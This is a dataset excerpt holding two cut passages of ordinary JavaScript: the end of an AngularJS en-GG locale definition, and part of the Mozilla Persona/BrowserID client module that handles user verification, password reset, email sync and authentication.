0 : n.length - i - 1;\n}\n\nfunction getVF(n, opt_precision) {\n var v = opt_precision;\n\n if (undefined === v) {\n v = Math.min(getDecimals(n), 3);\n }\n\n var base = Math.pow(10, v);\n var f = ((n * base) | 0) % base;\n return {v: v, f: f};\n}\n\n$provide.value(\"$locale\", {\n \"DATETIME_FORMATS\": {\n \"AMPMS\": [\n \"AM\",\n \"PM\"\n ],\n \"DAY\": [\n \"Sunday\",\n \"Monday\",\n \"Tuesday\",\n \"Wednesday\",\n \"Thursday\",\n \"Friday\",\n \"Saturday\"\n ],\n \"ERANAMES\": [\n \"Before Christ\",\n \"Anno Domini\"\n ],\n \"ERAS\": [\n \"BC\",\n \"AD\"\n ],\n \"FIRSTDAYOFWEEK\": 0,\n \"MONTH\": [\n \"January\",\n \"February\",\n \"March\",\n \"April\",\n \"May\",\n \"June\",\n \"July\",\n \"August\",\n \"September\",\n \"October\",\n \"November\",\n \"December\"\n ],\n \"SHORTDAY\": [\n \"Sun\",\n \"Mon\",\n \"Tue\",\n \"Wed\",\n \"Thu\",\n \"Fri\",\n \"Sat\"\n ],\n \"SHORTMONTH\": [\n \"Jan\",\n \"Feb\",\n \"Mar\",\n \"Apr\",\n \"May\",\n \"Jun\",\n \"Jul\",\n \"Aug\",\n \"Sep\",\n \"Oct\",\n \"Nov\",\n \"Dec\"\n ],\n \"STANDALONEMONTH\": [\n \"January\",\n \"February\",\n \"March\",\n \"April\",\n \"May\",\n \"June\",\n \"July\",\n \"August\",\n \"September\",\n \"October\",\n \"November\",\n \"December\"\n ],\n \"WEEKENDRANGE\": [\n 5,\n 6\n ],\n \"fullDate\": \"EEEE, d MMMM y\",\n \"longDate\": \"d MMMM y\",\n \"medium\": \"d MMM y HH:mm:ss\",\n \"mediumDate\": \"d MMM y\",\n \"mediumTime\": \"HH:mm:ss\",\n \"short\": \"dd/MM/y HH:mm\",\n \"shortDate\": \"dd/MM/y\",\n \"shortTime\": \"HH:mm\"\n },\n \"NUMBER_FORMATS\": {\n \"CURRENCY_SYM\": \"\\u00a3\",\n \"DECIMAL_SEP\": \".\",\n \"GROUP_SEP\": \",\",\n \"PATTERNS\": [\n {\n \"gSize\": 3,\n \"lgSize\": 3,\n \"maxFrac\": 3,\n \"minFrac\": 0,\n \"minInt\": 1,\n \"negPre\": \"-\",\n \"negSuf\": \"\",\n \"posPre\": \"\",\n \"posSuf\": \"\"\n },\n {\n \"gSize\": 3,\n \"lgSize\": 3,\n \"maxFrac\": 2,\n \"minFrac\": 2,\n \"minInt\": 1,\n \"negPre\": \"-\\u00a4\",\n \"negSuf\": \"\",\n \"posPre\": \"\\u00a4\",\n \"posSuf\": \"\"\n }\n ]\n },\n \"id\": \"en-gg\",\n \"localeID\": \"en_GG\",\n \"pluralCat\": function(n, opt_precision) { var i = n | 0; var vf = getVF(n, opt_precision); if (i == 1 && vf.v == 0) { return PLURAL_CATEGORY.ONE; } return PLURAL_CATEGORY.OTHER;}\n});\n}]);\n"} {"text": " -1);\n }\n\n // Determine if a certificate is expired. 
That will be\n // if it was issued *before* the domain key was last updated or\n // if the certificate expires in less that 5 minutes from now.\n function isCertExpired(serverTime, creationTime, cert) {\n // if it expires in less than 2 minutes, it's too old to use.\n var diff = cert.payload.exp.valueOf() - serverTime.valueOf();\n if (diff < (60 * 2 * 1000)) {\n return true;\n }\n\n // or if it was issued before the last time the domain key\n // was updated, it's invalid\n if (!cert.payload.iat) {\n helpers.log('Data Format ERROR: expected cert to have iat ' +\n 'property, but found none, marking expired');\n return true;\n } else if (cert.payload.iat < creationTime) {\n helpers.log('Certificate issued ' + cert.payload.iat +\n ' is before creation time ' + creationTime + ', marking expired');\n return true;\n }\n\n return false;\n }\n\n /*\n * Throws if the email record is invalid.\n * Record is invalid if:\n * 1) cannot load pubkey\n * 2) cannot load cert\n * 3) cannot extract cert\n * 4) cert is expired.\n */\n function checkRecordValidity(jwcrypto, record, serverTime, creationTime) {\n jwcrypto.loadPublicKeyFromObject(record.pub);\n\n if (!record.cert)\n throw new Error(\"missing cert\");\n\n var cert = jwcrypto.extractComponents(record.cert);\n if (isCertExpired(serverTime, creationTime, cert))\n throw new Error(\"expired cert\");\n }\n\n function removeInvalidIdentities(onSuccess, onFailure) {\n withContext(function(userContext, networkContext) {\n var serverTime = networkContext.getServerTime();\n var creationTime = networkContext.getDomainKeyCreationTime();\n\n cryptoLoader.load(function(jwcrypto) {\n var issuer = User.rpInfo.getIssuer();\n var emails = storage.getEmails(issuer);\n _.each(emails, function(record, address) {\n try {\n checkRecordValidity(jwcrypto, record, serverTime, creationTime);\n } catch (x) {\n return storage.invalidateEmail(address, issuer);\n }\n });\n onSuccess();\n });\n }, onFailure);\n }\n\n function stageAddressVerification(email, password, stagingStrategy,\n onComplete, onFailure) {\n // These are saved for the addressVerificationPoll. 
If there is\n // a stagedEmail or stagedPassword when the poll completes, try to\n // authenticate the user.\n stagedEmail = email;\n stagedPassword = password;\n\n // stagingStrategy is a curried function that will have all but the\n // onComplete and onFailure functions already set up.\n stagingStrategy(function(status) {\n if (!status) status = { success: false };\n var staged = status.success;\n\n if (!staged) status.reason = \"throttle\";\n // Used on the main site when the user verifies - once\n // verification is complete, the user is redirected back to the\n // RP and logged in.\n var site = User.rpInfo.getReturnTo();\n if (staged && site) storage.setReturnTo(site);\n complete(onComplete, status);\n }, onFailure);\n }\n\n function completeAddressVerification(completeFunc, token, password,\n onComplete, onFailure) {\n User.tokenInfo(token, function(info) {\n var invalidInfo = { valid: false };\n if (info) {\n completeFunc(token, password, function (resp) {\n var valid = resp.success;\n var result = invalidInfo;\n\n withContext(function(context) {\n if (valid) {\n result = _.extend({ valid: valid }, info);\n storage.setReturnTo(\"\");\n // If the user has successfully completed an address verification,\n // they are authenticated to the password status.\n context.setAuthLevel(\"password\");\n }\n\n complete(onComplete, result);\n }, onFailure);\n }, onFailure);\n } else if (onComplete) {\n onComplete(invalidInfo);\n }\n }, onFailure);\n\n }\n\n /**\n * onSuccess, if called, will return with \"complete\" if the verification\n * completes and the user is authed to the \"password\" level, or \"mustAuth\" if\n * the user must enter their password.\n */\n function addressVerificationPoll(checkFunc, email, onSuccess, onFailure) {\n function userVerified(resp) {\n if (stagedEmail && stagedPassword) {\n // The user has set their email and password as part of the\n // staging flow. Log them in now just to make sure their\n // authentication creds are up to date. This fixes a problem where the\n // backend incorrectly sends a mustAuth status to users who have just\n // completed verification. See issue #1682\n // https://github.com/mozilla/browserid/issues/1682\n User.authenticate(stagedEmail, stagedPassword, function(authenticated) {\n // The address verification poll does not send back a userid.\n // Use the userid set in User.authenticate\n withContext(function(context) {\n resp.userid = context.getUserId();\n resp.status = authenticated ? \"complete\" : \"mustAuth\";\n completeVerification(resp);\n }, onFailure);\n }, onFailure);\n\n stagedEmail = stagedPassword = null;\n }\n else {\n // If the user's completionStatus is complete but their\n // original authStatus was not password, meaning they have\n // not entered in their authentication credentials this session.\n // If the user is not authenticated to the password level, the backend\n // will reject any requests to certify a key because the user will\n // not have the correct creds to do so.\n // See issue #2088 https://github.com/mozilla/browserid/issues/2088\n //\n // Since a user may have entered their password on the main site during\n // a password reset, the only reliable way to know the user's auth\n // status is to ask the backend. 
Clear the current context and ask\n // the backend for an updated session_context.\n clearContext();\n User.checkAuthentication(function(authStatus) {\n if (resp.status === \"complete\" && authStatus !== \"password\")\n resp.status = \"mustAuth\";\n\n // The address verification poll does not send back a userid.\n // use the userid set in onContextChange.\n withContext(function(context) {\n resp.userid = context.getUserId();\n completeVerification(resp);\n }, onFailure);\n }, onFailure);\n }\n }\n\n function completeVerification(resp) {\n // As soon as the registration comes back as complete, we should\n // ensure that the stagedOnBehalfOf is cleared so there is no stale\n // data.\n storage.setReturnTo(\"\");\n\n // registrationComplete is used in shouldAskIfUsersComputer to\n // prevent the user from seeing the \"is this your computer\" screen if\n // they just completed a registration.\n registrationComplete = true;\n\n // If there is any sort of userid and auth_status, sync the emails.\n // If the user has to enter their password and status is mustAuth,\n // the required_email module expects the emails to already be synced.\n // See issue #3178\n withContext(function(context) {\n // If the status is still complete, the user's auth status is\n // definitively password.\n if (resp.status === \"complete\") {\n loggedIn(\"password\", resp.userid);\n }\n\n if (context.isUserAuthenticated()) {\n User.syncEmails(function() {\n complete(onSuccess, resp.status);\n }, onFailure);\n }\n else {\n complete(onSuccess, resp.status);\n }\n }, onFailure);\n }\n\n function poll() {\n checkFunc(email, function(resp) {\n var status = resp.status;\n // registration status checks the status of the last initiated registration,\n // it's possible return values are:\n // 'complete' - registration has been completed\n // 'pending' - a registration is in progress\n // 'mustAuth' - user must authenticate\n // 'noRegistration' - no registration is in progress\n if (status === \"complete\" || status === \"mustAuth\") {\n userVerified(resp);\n }\n else if (status === 'pending') {\n pollTimeout = setTimeout(poll, pollDuration);\n }\n else {\n complete(onFailure, status);\n }\n }, onFailure);\n }\n\n poll();\n }\n\n function cancelRegistrationPoll() {\n if (pollTimeout) {\n clearTimeout(pollTimeout);\n pollTimeout = null;\n }\n }\n\n function getIdPName(addressInfo) {\n return helpers.getDomainFromEmail(addressInfo.email);\n }\n\n /**\n * Persist an address and key pair locally.\n * @method persistEmailKeypair\n * @param {string} email - Email address to persist.\n * @param {object} keypair - Key pair to save\n * @param {function} [onComplete] - Called on successful completion.\n * @param {function} [onFailure] - Called on error.\n */\n function persistEmailKeypair(email, keypair, cert, onComplete, onFailure) {\n // XXX This needs to be looked at to make sure caching does not bite us.\n var issuer = User.rpInfo.getIssuer();\n User.addressInfo(email, function(info) {\n var now = new Date();\n var email_obj = storage.getEmail(email, issuer) || {\n created: now\n };\n\n _.extend(email_obj, {\n updated: now,\n pub: keypair.publicKey.toSimpleObject(),\n priv: keypair.secretKey.toSimpleObject(),\n cert: cert\n });\n\n if (info.state === \"unverified\") {\n email_obj.unverified = true;\n } else if (email_obj.unverified) {\n delete email_obj.unverified;\n }\n\n storage.addEmail(email, email_obj, issuer);\n if (onComplete) onComplete(true);\n }, onFailure);\n }\n\n /**\n * Persist an email address without a keypair\n * @method 
persistEmailWithoutKeypair\n * @param {object} options - options to save\n * @param {string} options.email - Email address to persist.\n */\n function persistEmailWithoutKeypair(options, issuer) {\n storage.addEmail(options.email, {\n created: new Date()\n }, issuer);\n }\n\n /**\n * Certify an identity with the server, persist it to storage if the server\n * says the identity is good\n * @method certifyEmailKeypair\n */\n function certifyEmailKeypair(email, keypair, onComplete, onFailure) {\n var rpInfo = User.rpInfo;\n network.certKey(email, keypair.publicKey, rpInfo.getIssuer(), rpInfo.getAllowUnverified(),\n function(cert) {\n persistEmailKeypair(email, keypair, cert, onComplete, onFailure);\n }, onFailure);\n }\n\n\n function withContext(onSuccess, onFailure) {\n network.withContext(function(networkContext) {\n // the context object will have been updated in onContextChange.\n onSuccess(context, networkContext);\n }, onFailure);\n }\n\n function clearContext() {\n network.clearContext();\n }\n\n function onContextChange(msg, newContext) {\n context = UserContext.create(newContext);\n var authLevel = context.getAuthLevel();\n if (window.$) {\n // TODO get this out of here!\n // jQuery is not included in the communication_iframe\n var func = !!authLevel ? 'addClass' : 'removeClass';\n $('body')[func]('authenticated');\n }\n\n if (context.isUserAuthenticated()) {\n // when session context returns with an authenticated user, update\n // localStorage to indicate we've seen this user on this device\n storage.usersComputer.setSeen(context.getUserId());\n }\n else {\n storage.clear();\n }\n }\n\n function loggedIn(authLevel, userId, onComplete, onFailure) {\n withContext(function(context) {\n context.setAuthLevel(authLevel);\n context.setUserId(userId);\n complete(onComplete, true);\n }, onFailure);\n }\n\n function loggedOut(onComplete, onFailure) {\n withContext(function(context) {\n storage.clear();\n\n context.setAuthLevel(false);\n context.setUserId(null);\n complete(onComplete, true);\n }, onFailure);\n }\n\n function handleAuthenticationResponse(email, type, onComplete,\n onFailure, status) {\n var authenticated = status.success;\n if (!authenticated) return loggedOut(complete.curry(onComplete, false), onFailure);\n\n var userid = status.userid;\n loggedIn(type, userid, function() {\n // The back end can suppress asking the user whether this is their\n // computer. This happens on FirefoxOS devices for now and may expand\n // in the future.\n if (status.suppress_ask_if_users_computer) {\n storage.usersComputer.setConfirmed(userid);\n }\n\n User.syncEmails(complete.curry(onComplete, authenticated), onFailure);\n }, onFailure);\n }\n\n User = {\n init: function(config) {\n config = config || {};\n mediator.subscribe('context_info', onContextChange);\n\n if (config.provisioning) {\n provisioning = config.provisioning;\n }\n\n // BEGIN TESTING API\n if (config.pollDuration) {\n pollDuration = config.pollDuration;\n }\n // END TESTING API\n },\n\n reset: function() {\n provisioning = BrowserID.Provisioning;\n User.resetCaches();\n User.rpInfo = null;\n registrationComplete = false;\n pollDuration = POLL_DURATION;\n stagedEmail = stagedPassword = context = null;\n },\n\n resetCaches: function() {\n addressCache = {};\n primaryAuthCache = {};\n },\n\n /**\n * Set the RP info\n * @method setRpInfo\n */\n setRpInfo: function(rpInfo) {\n User.rpInfo = rpInfo;\n },\n\n /**\n * Set the interface to use for networking. 
Used for unit testing.\n * @method setNetwork\n * @param {BrowserID.Network} networkInterface - BrowserID.Network\n * compatible interface to use.\n */\n setNetwork: function(networkInterface) {\n network = networkInterface;\n },\n\n setOriginEmail: function(email) {\n storage.site.set(User.rpInfo.getOrigin(), \"email\", email);\n },\n\n getOriginEmail: function() {\n return storage.site.get(User.rpInfo.getOrigin(), \"email\");\n },\n\n /**\n * Return the user's userid, which will an integer if the user\n * is authenticated, undefined otherwise.\n *\n * @method userid\n */\n userid: function(onComplete, onFailure) {\n if (!onComplete) throw new Error(\"no longer supports sync get\");\n withContext(function(context) {\n complete(onComplete, context.getUserId());\n }, onFailure);\n },\n\n withContext: withContext,\n clearContext: clearContext,\n\n /**\n * Create a user account - this creates an user account that must\n * be verified.\n * @method createSecondaryUser\n * @param {string} email\n * @param {string} password\n * @param {function} [onComplete] - Called on completion.\n * @param {function} [onFailure] - Called on error.\n */\n createSecondaryUser: function(email, password, onComplete, onFailure) {\n stageAddressVerification(email, password,\n network.createUser.bind(network, email, password, User.rpInfo), function(status) {\n // If creating an unverified account, the user will not go\n // through the verification flow while the dialog is open and the\n // cache will not be updated accordingly. Update the cache now.\n if (status.unverified) {\n var cachedAddress = addressCache[email];\n if (cachedAddress) {\n cachedAddress.state = \"unverified\";\n }\n }\n complete(onComplete, status);\n }, onFailure);\n },\n\n /**\n * Create a primary user.\n * @method createPrimaryUser\n * @param {object} info\n * @param {function} onComplete - function to call on complettion. Called\n * with two parameters - status and info.\n * Status can be:\n * primary.already_added\n * primary.verified\n * primary.verify\n * primary.could_not_add\n *\n * info is passed on primary.verify and contains the info necessary to\n * verify the user with the IdP\n */\n createPrimaryUser: function(info, onComplete, onFailure) {\n var email = info.email;\n User.provisionPrimaryUser(email, info, function(status, provInfo) {\n if (status === \"primary.verified\") {\n User.authenticateWithAssertion(email, provInfo.assertion, function(status) {\n if (status) {\n onComplete(\"primary.verified\");\n }\n else {\n onComplete(\"primary.could_not_add\");\n }\n }, onFailure);\n }\n else {\n onComplete(status, provInfo);\n }\n }, onFailure);\n },\n\n /**\n * A full provision a primary user, if they are authenticated, save their\n * cert/keypair. Note, we do not authenticate to login.persona.org but\n * merely get an assertion for login.persona.org so that we can either add the\n * email to the current account or authenticate the user if not\n * authenticated.\n * @method provisionPrimaryUser\n * @param {string} email\n * @param {object} info - provisioning info\n * @param {function} [onComplete] - called when complete. Called with\n * status field and info. 
Status can be:\n * primary.already_added\n * primary.verified\n * primary.verify\n * primary.could_not_add\n * @param {function} [onFailure] - called on failure\n */\n provisionPrimaryUser: function(email, info, onComplete, onFailure) {\n User.primaryUserAuthenticationInfo(email, info, function(authInfo) {\n if (authInfo.authenticated) {\n persistEmailKeypair(email, authInfo.keypair, authInfo.cert,\n function() {\n // We are getting an assertion for persona.org.\n User.getAssertion(email, PERSONA_ORG_AUDIENCE, function(assertion) {\n if (assertion) {\n onComplete(\"primary.verified\", {\n assertion: assertion\n });\n }\n else {\n onComplete(\"primary.could_not_add\");\n }\n }, onFailure);\n }\n );\n }\n else {\n onComplete(\"primary.verify\", info);\n }\n }, onFailure);\n },\n\n /**\n * Get the IdP authentication info for a user.\n * @method primaryUserAuthenticationInfo\n * @param {string} email\n * @param {object} info - provisioning info\n * @param {function} [onComplete] - called when complete. Called with\n * provisioning info as well as keypair, cert, and authenticated.\n * authenticated - boolean, true if user is authenticated with primary.\n * false otw.\n * keypair - returned if user is authenticated.\n * cert - returned if user is authenticated.\n * @param {function} [onFailure] - called on failure\n */\n primaryUserAuthenticationInfo: function(email, info, onComplete, onFailure) {\n var idInfo = storage.getEmail(email, User.rpInfo.getIssuer());\n\n primaryAuthCache = primaryAuthCache || {};\n\n function complete(info) {\n primaryAuthCache[email] = info;\n onComplete && _.defer(function() {\n onComplete(info);\n });\n }\n\n if (primaryAuthCache[email]) {\n // If we have the info in our cache, we most definitely do not have to\n // ask for it.\n return complete(primaryAuthCache[email]);\n }\n else if (idInfo && idInfo.cert) {\n // If we already have the info in storage, we know the user has a valid\n // cert with their IdP, we say they are authenticated and pass back the\n // appropriate info.\n var userInfo = _.extend({authenticated: true}, idInfo, info);\n return complete(userInfo);\n }\n\n provisioning(\n {\n email: email,\n url: info.prov,\n ephemeral: !storage.usersComputer.confirmed(email)\n },\n function(keypair, cert) {\n var userInfo = _.extend({\n keypair: keypair,\n cert: cert,\n authenticated: true\n }, info);\n\n complete(userInfo);\n },\n function(error) {\n // issue #2339 - in case an error is raised we don't care\n // about the specific error code.\n if (error.code === \"primaryError\") {\n var userInfo = _.extend({\n authenticated: false\n }, info);\n complete(userInfo);\n }\n else {\n onFailure($.extend(info, { action: { message: error }}));\n }\n }\n );\n },\n\n /**\n * Poll the server until user registration is complete.\n * @method waitForUserValidation\n * @param {string} email - email address to check.\n * @param {function} [onSuccess] - Called to give status updates.\n * @param {function} [onFailure] - Called on error.\n */\n waitForUserValidation: addressVerificationPoll.curry(network.checkUserRegistration),\n\n /**\n * Cancel the waitForUserValidation poll\n * @method cancelUserValidation\n */\n cancelUserValidation: cancelRegistrationPoll,\n\n /**\n * Get site and email info for a token\n * @method tokenInfo\n * @param {string} token\n * @param {function} [onComplete]\n * @param {function} [onFailure]\n */\n tokenInfo: function(token, onComplete, onFailure) {\n network.emailForVerificationToken(token, function (info) {\n if (info) {\n info = 
_.extend(info, { returnTo: storage.getReturnTo() });\n }\n\n complete(onComplete, info);\n }, onFailure);\n\n },\n\n /**\n * Verify a user\n * @method verifyUser\n * @param {string} token - token to verify.\n * @param {string} password\n * @param {function} [onComplete] - Called on completion.\n * Called with an object with valid, email, and origin if valid, called\n * with valid=false otw.\n * @param {function} [onFailure] - Called on error.\n */\n verifyUser: completeAddressVerification.curry(network.completeUserRegistration),\n\n /**\n * Check if the user can set their password. Only returns true for users\n * with secondary accounts\n * @method canSetPassword\n * @param {function} [onComplete] - Called on with boolean flag on\n * successful completion.\n * @param {function} [onFailure] - Called on error.\n */\n canSetPassword: function(onComplete, onFailure) {\n withContext(function(ctx) {\n complete(onComplete, ctx.hasPassword());\n }, onFailure);\n },\n\n /**\n * update the password of the current user.\n * @method changePassword\n * @param {string} oldpassword - the old password.\n * @param {string} newpassword - the new password.\n * @param {function} [onComplete] - called on completion. Called with one\n * parameter, status - set to true if password update is successful, false\n * otw.\n * @param {function} [onFailure] - called on XHR failure.\n */\n changePassword: function(oldpassword, newpassword, onComplete, onFailure) {\n network.changePassword(oldpassword, newpassword, function(resp) {\n // successful change of password will upgrade a session to password\n // level auth\n var success = resp.success;\n if (!success)\n return complete(onComplete, success);\n\n withContext(function(context) {\n loggedIn(\"password\", context.getUserId(),\n onComplete, onFailure);\n }, onFailure);\n }, onFailure);\n },\n\n /**\n * Request a password reset for the given email address.\n * @method requestPasswordReset\n * @param {string} email\n * @param {function} [onComplete] - Callback to call when complete, called\n * with a single object, info.\n * info.status {boolean} - true or false whether request was successful.\n * info.reason {string} - if status false, reason of failure.\n * @param {function} [onFailure] - Called on XHR failure.\n */\n requestPasswordReset: function(email, onComplete, onFailure) {\n var rpInfo = User.rpInfo;\n User.addressInfo(email, function(info) {\n // user is not known. 
Can't request a password reset.\n if (info.state === \"unknown\") {\n complete(onComplete, { success: false, reason: \"invalid_email\" });\n }\n // user is trying to reset the password of a primary address.\n else if (info.type === \"primary\") {\n complete(onComplete, { success: false, reason: \"primary_address\" });\n }\n else {\n stageAddressVerification(email, null,\n network.requestPasswordReset.bind(network, email, rpInfo),\n onComplete, onFailure);\n }\n }, onFailure);\n },\n\n /**\n * Verify the password reset for a user.\n * @method completePasswordReset\n * @param {string} token - token to verify.\n * @param {string} password\n * @param {function} [onComplete] - Called on completion.\n * Called with an object with valid, email, and origin if valid, called\n * with valid=false otw.\n * @param {function} [onFailure] - Called on error.\n */\n completePasswordReset: completeAddressVerification.curry(network.completePasswordReset),\n\n /**\n * Wait for the password reset to complete\n * @method waitForPasswordResetComplete\n * @param {string} email - email address to check.\n * @param {function} [onSuccess] - Called to give status updates.\n * @param {function} [onFailure] - Called on error.\n */\n waitForPasswordResetComplete: addressVerificationPoll.curry(network.checkPasswordReset),\n\n /**\n * Cancel the waitForPasswordResetComplete poll\n * @method cancelWaitForPasswordResetComplete\n */\n cancelWaitForPasswordResetComplete: cancelRegistrationPoll,\n\n /**\n * Request the reverification of an unverified email address\n * @method requestEmailReverify\n * @param {string} email\n * @param {function} [onComplete]\n * @param {function} [onFailure]\n */\n requestEmailReverify: function(email, onComplete, onFailure) {\n if (!storage.getEmail(email, User.rpInfo.getIssuer())) {\n // user does not own this address.\n complete(onComplete, { success: false, reason: \"invalid_email\" });\n }\n else {\n // try to reverify this address.\n stageAddressVerification(email, null,\n network.requestEmailReverify.bind(network, email, User.rpInfo),\n onComplete, onFailure);\n }\n },\n\n // the verification page for reverifying an email and adding an email to an\n // account are the same, both are handled by the /confirm page. the\n // /confirm page uses the verifyEmail function. completeEmailReverify is\n // not needed.\n\n /**\n * Wait for the email reverification to complete\n * @method waitForEmailReverifyComplete\n * @param {string} email - email address to check.\n * @param {function} [onSuccess] - Called to give status updates.\n * @param {function} [onFailure] - Called on error.\n */\n waitForEmailReverifyComplete: addressVerificationPoll.curry(network.checkEmailReverify),\n\n /**\n * Cancel the waitForEmailReverifyComplete poll\n * @method cancelWaitForEmailReverifyComplete\n */\n cancelWaitForEmailReverifyComplete: cancelRegistrationPoll,\n\n /**\n * Request a transition to secondary for the given email address.\n * @method requestTransitionToSecondary\n * @param {string} email\n * @param {string} password\n * @param {function} [onComplete] - Callback to call when complete, called\n * with a single object, info.\n * info.status {boolean} - true or false whether request was successful.\n * info.reason {string} - if status false, reason of failure.\n * @param {function} [onFailure] - Called on XHR failure.\n */\n requestTransitionToSecondary: function(email, password, onComplete, onFailure) {\n var rpInfo = User.rpInfo;\n User.addressInfo(email, function(info) {\n // user is not known. 
Can't request a transition to secondary.\n if (info.state === \"unknown\") {\n complete(onComplete, { success: false, reason: \"invalid_email\" });\n }\n // user is trying to transition to a secondary for a primary address.\n else if (info.type === \"primary\") {\n complete(onComplete, { success: false, reason: \"primary_address\" });\n }\n else {\n stageAddressVerification(email, password,\n network.requestTransitionToSecondary.bind(network, email, password, rpInfo),\n onComplete, onFailure);\n }\n }, onFailure);\n },\n\n /**\n * Verify the transition to secondary for a user.\n * @method completeTransitionToSecondary\n * @param {string} token - token to verify.\n * @param {string} password\n * @param {function} [onComplete] - Called on completion.\n * Called with an object with valid, email, and origin if valid, called\n * with valid=false otw.\n * @param {function} [onFailure] - Called on error.\n */\n completeTransitionToSecondary: completeAddressVerification.curry(network.completeTransitionToSecondary),\n\n /**\n * Wait for the transition to secondary to complete\n * @method waitForTransitionToSecondaryComplete\n * @param {string} email - email address to check.\n * @param {function} [onSuccess] - Called to give status updates.\n * @param {function} [onFailure] - Called on error.\n */\n waitForTransitionToSecondaryComplete: addressVerificationPoll.curry(network.checkTransitionToSecondary),\n\n /**\n * Cancel the waitForTransitionToSecondaryComplete poll\n * @method cancelWaitForTransitionToSecondaryComplete\n */\n cancelWaitForTransitionToSecondaryComplete: cancelRegistrationPoll,\n\n\n /**\n * Cancel the current user's account. Remove last traces of their\n * identity.\n * @method cancelUser\n * @param {function} [onComplete] - Called whenever complete.\n * @param {function} [onFailure] - called on error.\n */\n cancelUser: function(onComplete, onFailure) {\n network.cancelUser(function() {\n loggedOut(onComplete, onFailure);\n }, onFailure);\n },\n\n /**\n * Log the current user out.\n * @method logoutUser\n * @param {function} [onComplete] - Called whenever complete.\n * @param {function} [onFailure] - called on error.\n */\n logoutUser: function(onComplete, onFailure) {\n User.checkAuthentication(function(authenticated) {\n if (!authenticated) return complete(onComplete, authenticated);\n\n network.logout(function() {\n loggedOut(onComplete, onFailure);\n }, onFailure);\n }, onFailure);\n },\n\n /**\n * Sync local identities with login.persona.org. 
Generally should not need to\n * be called.\n * @method syncEmails\n * @param {function} [onComplete] - Called whenever complete.\n * @param {function} [onFailure] - Called on error.\n */\n syncEmails: function(onComplete, onFailure) {\n removeInvalidIdentities(function () {\n var issued_identities = User.getStoredEmailKeypairs();\n\n network.listEmails(function(server_emails) {\n withContext(function(context) {\n var userid = context.getUserId();\n // update our local storage map of email addresses to user ids\n if (userid) {\n storage.updateEmailToUserIDMapping(userid, server_emails);\n }\n });\n\n // lists of emails\n var client_emails = _.keys(issued_identities);\n\n var emails_to_add_pair = [_.difference(server_emails, client_emails)];\n var emails_to_remove_pair = [_.difference(client_emails, server_emails)];\n var emails_to_update_pair = [_.intersection(client_emails, server_emails)];\n\n var issuer = User.rpInfo.getIssuer();\n if (!User.rpInfo.isDefaultIssuer()) {\n var force_issuer_identities = storage.getEmails(issuer);\n var force_issuer_emails = _.keys(force_issuer_identities);\n emails_to_add_pair.push(_.difference(server_emails, force_issuer_emails));\n emails_to_remove_pair.push(_.difference(force_issuer_emails, server_emails));\n emails_to_update_pair.push(_.intersection(force_issuer_emails, server_emails));\n }\n\n // remove emails\n _.each(emails_to_remove_pair, function (emails_to_remove, i) {\n _.each(emails_to_remove, function(email) {\n if (0 === i)\n storage.removeEmail(email, \"default\");\n else\n storage.removeEmail(email, issuer);\n });\n });\n\n // these are new emails\n _.each(emails_to_add_pair, function(emails_to_add, i) {\n _.each(emails_to_add, function(email) {\n if (0 === i) {\n persistEmailWithoutKeypair({ email: email }, \"default\");\n } else {\n // issuer is always a secondary\n persistEmailWithoutKeypair({ email: email }, issuer);\n }\n });\n });\n complete(onComplete);\n }, onFailure);\n }, onFailure);\n },\n\n /**\n * Check whether the current user is authenticated. Calls the callback\n * with false if cookies are disabled.\n * @method checkAuthentication\n * @param {function} [onComplete] - Called with user's auth level if\n * authenticated, false otw.\n * @param {function} [onFailure] - Called on error.\n */\n checkAuthentication: function(onComplete, onFailure) {\n network.cookiesEnabled(function(cookiesEnabled) {\n if (cookiesEnabled) {\n withContext(function(context) {\n complete(onComplete, context.getAuthLevel());\n }, onFailure);\n }\n else {\n complete(onComplete, cookiesEnabled);\n }\n }, onFailure);\n },\n\n /**\n * Check whether the current user is authenticated. If authenticated, sync\n * identities.\n * @method checkAuthenticationAndSync\n * @param {function} [onComplete] - Called on sync completion with one\n * boolean parameter, authenticated. authenticated will be true if user\n * is authenticated, false otw.\n * @param {function} [onFailure] - Called on error.\n */\n checkAuthenticationAndSync: function(onComplete, onFailure) {\n User.checkAuthentication(function(authenticated) {\n if (authenticated) {\n User.syncEmails(function() {\n // no emails means they must have been removed from this\n // account. 
at any rate, the user can't do anything without\n // any emails, so log them out.\n if (storage.getEmailCount() === 0) {\n User.logoutUser(function() {\n complete(onComplete, false);\n }, onFailure);\n } else {\n complete(onComplete, authenticated);\n }\n }, onFailure);\n }\n else {\n complete(onComplete, authenticated);\n }\n }, onFailure);\n },\n\n /**\n * Authenticate the user with the given email and password. This will sync\n * the user's addresses.\n * @method authenticate\n * @param {string} email - Email address to authenticate.\n * @param {string} password - Password.\n * @param {function} [onComplete] - Called on completion with status. true\n * if user is authenticated, false otw.\n * @param {function} [onFailure] - Called on error.\n */\n authenticate: function(email, password, onComplete, onFailure) {\n network.authenticate(email, password, User.rpInfo.getAllowUnverified(),\n handleAuthenticationResponse.curry(email, \"password\", onComplete,\n onFailure), onFailure);\n },\n\n /**\n * Authenticate the user with the given email and assertion. This will sync\n * the user's addresses.\n * @method authenticateWithAssertion\n * @param {string} email\n * @param {string} assertion\n * @param {function} [onComplete] - Called on completion with status. true\n * if user is authenticated, false otw.\n * @param {function} [onFailure] - Called on error.\n */\n authenticateWithAssertion: function(email, assertion, onComplete, onFailure) {\n network.authenticateWithAssertion(email, assertion,\n handleAuthenticationResponse.curry(email, \"assertion\", onComplete,\n onFailure), onFailure);\n\n },\n\n /**\n * Check whether the email is already registered.\n * @method isEmailRegistered\n * @param {string} email - Email address to check.\n * @param {function} [onComplete] - Called with one boolean parameter when\n * complete. Parameter is true if `email` is already registered, false\n * otw.\n * @param {function} [onFailure] - Called on XHR failure.\n */\n isEmailRegistered: function(email, onComplete, onFailure) {\n network.emailRegistered(email, onComplete, onFailure);\n },\n\n /**\n * Get information about an email address. Who vouches for it?\n * (is it a primary or a secondary)\n * @method addressInfo\n * @param {string} email - Email address to check.\n * @param {function} [onComplete] - Called with an object on success,\n * containing these properties:\n * type: \n * known: boolean, present if type is secondary. 
